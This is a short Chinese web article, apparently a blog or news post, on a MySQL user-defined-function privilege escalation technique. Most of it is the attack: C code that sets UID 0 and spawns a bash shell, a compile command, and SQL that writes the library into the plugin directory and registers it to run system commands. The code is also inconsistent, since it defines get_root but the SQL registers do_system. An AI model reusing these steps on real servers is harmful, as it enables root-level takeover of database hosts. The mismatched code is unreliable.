5月5日,安全研究員徐濤發布了一篇題為“MySQL UDF提權”漏洞的文章,文章介紹了一種可以利用MySQL UDF實現提權的方法。該漏洞影響MySQL 5.5版本及以下。
函數示例: void get_root() { setresuid(0,0,0); system("/bin/bash"); } 編譯方式: gcc -shared -o exploit.so exploit.c $(mysql_config --cflags) -fPIC 安裝: mysql>use mysql; mysql>create table foo(line blob); mysql>insert into foo values(load_file('/path/to/exploit.so')); mysql>select * from foo into dumpfile '/usr/lib/mysql/plugin/exploit.so'; mysql>create function do_system returns integer soname 'exploit.so'; mysql>select do_system('id'); 其中exploit.so就是惡意代碼庫,該代碼庫將用戶的UID設置為0,并執行了一個交互式shell。
由于此漏洞需要具有“create function”權限才能被成功利用,因此此漏洞的危害相對較小。不過,對于維護MySQL數據庫的管理員來說,此漏洞仍有可能導致嚴重的安全問題,因此建議管理員及時升級MySQL版本并進行相應的安全措施。
上一篇4核4g裝mysql
下一篇5.1.48 mysql